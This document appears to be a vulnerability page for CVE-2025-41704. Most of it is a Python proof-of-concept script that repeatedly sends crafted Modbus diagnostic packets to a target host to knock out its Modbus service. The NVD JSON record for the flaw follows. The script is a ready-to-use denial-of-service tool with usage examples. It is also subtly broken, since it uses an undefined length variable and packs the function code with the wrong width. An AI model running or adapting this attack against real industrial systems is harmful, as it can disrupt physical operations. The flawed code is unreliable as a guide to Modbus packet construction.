CVE-2025-41704

#!/usr/bin/env python3 # CVE-2025-41704 - Modbus Service DoS PoC # This PoC demonstrates sending a crafted Modbus packet with specific # function code and sub-function code to trigger DoS on the Modbus service. import socket import struct import sys def build_modbus_dos_packet(transaction_id=0x0001, unit_id=0x01): """ Build a Modbus TCP packet with specific function code and sub-function code that triggers the DoS vulnerability (CVE-2025-41704). """ # Modbus Application Protocol (MBAP) Header # Transaction Identifier (2 bytes) # Protocol Identifier (2 bytes) - 0x0000 for Modbus # Length (2 bytes) - remaining bytes count # Unit Identifier (1 byte) # Function code: using a diagnostic function code (e.g., 0x08) # Sub-function code: specific value to trigger the vulnerability function_code = 0x08 # Diagnostic function code sub_function_code = 0x0001 # Specific sub-function code data = struct.pack('>HH', function_code, sub_function_code) # Calculate length: unit_id + PDU length = 1 + len(data) # Build MBAP header mbap_header = struct.pack('>HHHB', transaction_id, 0x0000, # Protocol identifier (Modbus) length, unit_id) packet = mbap_header + data return packet def send_dos_packet(target_host, target_port=502, count=10): """ Send crafted DoS packets to the target Modbus service. """ print(f"[*] Targeting Modbus service at {target_host}:{target_port}") for i in range(count): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_host, target_port)) packet = build_modbus_dos_packet(transaction_id=i+1) sock.send(packet) print(f"[+] Packet {i+1}/{count} sent successfully") try: response = sock.recv(1024) print(f"[*] Response received: {response.hex()}") except socket.timeout: print(f"[*] No response (timeout) - service may be unresponsive") sock.close() except Exception as e: print(f"[-] Error: {e}") print("[!] DoS attack completed. Check target service availability.") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_host> [target_port] [packet_count]") print(f"Example: {sys.argv[0]} 192.168.1.100 502 10") sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 502 count = int(sys.argv[3]) if len(sys.argv) > 3 else 10 send_dos_packet(host, port, count)

{"cve": {"id": "CVE-2025-41704", "sourceIdentifier": "[email protected]", "published": "2025-10-14T08:15:35.470", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthanticated remote attacker can perform a DoS of the Modbus service by sending a specific function and sub-function code without affecting the core functionality."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2025-072", "source": "[email protected]"}, {"url": "http://seclists.org/fulldisclosure/2025/Oct/12", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}